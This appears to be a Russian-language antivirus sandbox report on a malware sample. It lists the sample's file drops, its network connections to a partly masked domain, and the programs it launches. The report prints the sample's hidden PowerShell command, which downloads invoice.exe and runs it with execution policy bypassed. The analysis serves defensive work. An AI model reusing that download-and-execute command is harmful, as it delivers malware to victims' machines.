Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://ko##were.in/invoice.exe как %appdata%\kunla
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\abctfhghgdghgh‹.sct
- %APPDATA%\kunla
Сетевая активность
Подключается к
- 'ko##were.in':80
UDP
- DNS ASK ko##were.in
Другое
Ищет следующие окна
- ClassName: 'NDDEAgnt' WindowName: 'NetDDE Agent'
- ClassName: 'AdobeAcrobat' WindowName: ''
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://ko##were.in/invoice.exe','%APPDATA%\kunla');Start-Process '%APPDATA%\k...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\rundll32.exe' <SYSTEM32>\shell32.dll,OpenAs_RunDLL %APPDATA%\kunla
- '%ProgramFiles(x86)%\adobe\acrobat reader dc\reader\acrord32.exe' "%APPDATA%\kunla"
